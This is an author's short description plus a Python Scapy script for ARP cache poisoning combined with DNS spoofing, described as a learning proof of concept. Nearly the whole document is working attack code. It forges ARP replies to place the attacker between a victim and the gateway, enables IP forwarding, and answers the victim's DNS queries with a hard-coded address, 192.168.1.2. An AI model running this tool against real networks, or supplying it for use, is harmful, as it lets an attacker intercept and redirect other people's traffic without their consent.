DNS Poison

This tool is a copy paste of my arp-cache poisoner with an additional function to poison DNS. Any request made to port 53 is sent to 192.168.1.2. Yes its hard-coded because it was a poc to further develop my understanding of DNS and also learn how to create child processes(forks) to split tasks up. This also automatically enables port forwarding as I forgot to implement that in my original arp poison tool. The arp cache does its magic in a different process to the dns sniffer.

#!/usr/bin/python

from scapy.all import *
import sys
import netifaces as nif
import netifaces
import signal
import os

def arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC):

# print "We in the PID of the parent: %d"%os.getpid()
os.system('sysctl -w net.ipv4.ip_forward=1')
print "IP Forwarding enabled"

#Send the packet to the victims mac. The source of the MAC is the GW address. In the ARP field the MAC of the GW IP address is our MAC.
#additionaly we set the op to an "is-at" packet
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = targetIP)

#Now we want the GW to think we are the victim.
#We send the packet the to GW/TARGET the source is from the Victim. We say the MAC of the Victim is our MAC
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = localMAC, psrc = victimIP)

print "\nForwarding target: %s to  MAC %s"%(targetIP, localMAC)
print "Forwarding target: %s to MAC %s"%(victimIP, localMAC)

while running:
sendp(victimARP, verbose = 0, inter = 1)
sendp(targetARP, verbose = 0, inter = 1)
signal.signal(signal.SIGINT, ctrlc_handler)

def arpRestore(victimIP, targetIP, victimMAC, targetMAC):

# print "We are in process %d"%os.getpid()
victimARP = Ether(dst = victimMAC, src = targetMAC)/ARP(op = "is-at", hwsrc = targetMAC, psrc = targetIP)
targetARP = Ether(dst = targetMAC, src = victimMAC)/ARP(op = "is-at", hwsrc = victimMAC, psrc = victimIP)
print "\nRestoring arp caches..."

for i in range(1, 5):
sendp(victimARP, inter = 0.5)
sendp(targetARP, verbose = 0, inter = 0.5)

os.system('sysctl -w net.ipv4.ip_forward=0')
print "IP forwarding disabled"
print "Exiting..."
sys.exit()

def dnsPoison(pkt):
# print "We are in PID of the child %d"%os.getpid()
if (pkt.haslayer(DNS)) and (pkt.getlayer(DNS).qr == 0) and (pkt[IP].src == victimIP):
ip = pkt.getlayer(IP)
dns = pkt.getlayer(DNS)
ip.src = pkt[IP].src
ip.dst = pkt[IP].dst
ip.sport = pkt[UDP].sport
ip.dport = pkt[UDP].dport
queryname = dns.qd.qname
resp = IP(dst=ip.src,src=ip.dst)/UDP(dport=ip.sport,sport=ip.dport)/DNS(id=dns.id,qr=1,qd=dns.qd,an=DNSRR(rrname=queryname,ttl=10,rdata='192.168.1.2'))
send(resp, verbose=0)
print pkt.summary()

def ctrlc_handler(signum, frm):
running = False
arpRestore(victimIP, targetIP, victimMAC, targetMAC)

#########################################
###########Program Start!################
#########################################
try:
victimIP = sys.argv[1]
targetIP = sys.argv[2]
# url = sys.argv[3]
interface = sys.argv[3]

victimMAC = getmacbyip(victimIP)
targetMAC = getmacbyip(targetIP)

addrs = netifaces.ifaddresses(interface)
localMAC = addrs[nif.AF_LINK][0]["addr"]
except:
print "\nUsage: arp_dns_poison <victim-ip> <target-ip> <interface>\n"
print "Example: arp_dns_poison 192.168.1.1 192.168.1.254 eth0\n"

running = True

childPID = os.fork()
if childPID == 0:
sniff(iface = interface, filter = "udp and port 53", prn = dnsPoison)
else:
arpPoison(victimIP, targetIP, victimMAC, targetMAC, localMAC)